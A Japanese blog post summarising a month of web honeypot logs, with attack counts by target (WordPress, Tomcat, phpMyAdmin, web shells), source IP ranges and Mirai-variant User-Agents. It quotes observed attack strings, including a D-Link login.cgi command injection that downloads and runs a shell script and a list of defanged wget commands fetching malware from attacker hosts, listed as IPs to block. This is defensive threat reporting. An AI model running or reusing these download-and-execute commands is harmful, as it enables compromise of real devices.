ハニーポットのログ分析まとめ(2018年08月度)
月の半分を過ぎましたが、ようやく先月分の集計です。
前置き:WOWHoneypotを使って80/tcpのアクセスログを観測しています。
まずは、件数の推移です。
8/24にWordPressの調査の通信が大量に来ていた日がトップです。
次点の8/27はTomcatの管理ページへのアクセスがあった日です。
メソッドとパスと攻撃手法での集計です。(Top10)
件数 | 対象 | メソッド | パス例 |
6392 | WordPress | POST | //wp-login.php |
2716 | WebShell | POST | /qq.php |
2319 | Tomcat管理ページ | GET | /manager/html |
1131 | phpMyAdmin | GET | /phpMyAdmin/index.php |
925 | - | GET | / |
215 | Apache Struts2 | GET | /index.action |
179 | Mirai亜種 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
32 | 不正中継 | CONNECT | 133.130.126.119:43 |
31 | - | PROPFIND | / |
30 | WebDAV | GET | /webdav/ |
手法により集計しない、メソッドとパスのTop20は以下です。
次に、送信元IPです。第3オクテットでまとめます。だからどうだ、という感じではありますが。
6345 | 80.82.67.0 |
2001 | 118.174.64.0 |
168 | 23.89.4.0 |
168 | 177.84.241.0 |
167 | 58.26.108.0 |
167 | 36.89.89.0 |
167 | 119.15.91.0 |
167 | 103.105.57.0 |
165 | 209.58.139.0 |
164 | 59.110.160.0 |
164 | 39.108.58.0 |
164 | 139.199.204.0 |
163 | 47.75.13.0 |
163 | 118.24.74.0 |
162 | 139.129.214.0 |
159 | 111.231.101.0 |
158 | 121.201.23.0 |
157 | 106.14.205.0 |
154 | 154.8.140.0 |
146 | 51.174.34.0 |
次に、ハンティングログの集計です。これはマルウェアを取得するブラックIPとして遮断した方が良いもの達です。
58 | wget hxxp://209.141.33[.]86/d |
23 | wget hxxp://176.32.32[.]156/bin |
17 | wget hxxp://212.237.32[.]62/k |
17 | wget hxxp://148.72.176[.]78/ngynx |
14 | wget hxxp://80.211.67[.]245/k |
11 | wget hxxp://77.87.77[.]250/izuku.sh |
8 | wget hxxp://148.72.176[.]78/ken.sh |
6 | wget -c hxxp://wap.tfddos[.]net:57843/linux |
5 | wget hxxp://80.211.112[.]150/k |
5 | wget hxxp://178.128.11[.]199/rvs |
5 | wget -c hxxp://111.67.194[.]29:32322/Manager |
4 | wget hxxp://46.166.185[.]42/e |
3 | wget hxxp://178.128.11[.]199/qtx.mips |
3 | wget hxxp://176.32.33[.]171/bin |
2 | wget hxxp://128.199.251[.]119/t.php |
2 | wget -c hxxp://23.249.162[.]123:9998/servic |
1 | wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server |
1 | wget hxxp://gowel[.]top/l32 |
1 | wget hxxp://77.81.226[.]28/bin |
1 | wget hxxp://50.115.166[.]136/hakai.mips |
1 | wget hxxp://50.115.166[.]136/bin |
1 | wget hxxp://222.186.153[.]142:26591/nodebase |
1 | wget hxxp://217.61.6[.]127/t |
1 | wget+hxxp://199.195.254[.]118/jaws |
1 | wget hxxp://199.195.254[.]118/dlink |
1 | wget hxxp://185.173.93[.]164:5555/Linux.TF |
1 | wget hxxp://119.188.182[.]178:5198/javas.log |
1 | wget hxxp://104.148.70[.]5:8080/net11 |
1 | wget -c hxxp://aaa.linuxa[.]club:57843/linux |
個別に見ていきたいと思います。
D-Linkを狙うMirai亜種について、User-Agentを集計します。
69 | Hakai/2.0 |
40 | Shinka/1.0 |
36 | LMAO/2.0 |
19 | Gemini/2.0 |
2 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Hello, World |
D-Linkを狙うMirai亜種の日時の件数推移です。
phpMyAdminの日時の件数推移です。
以上です。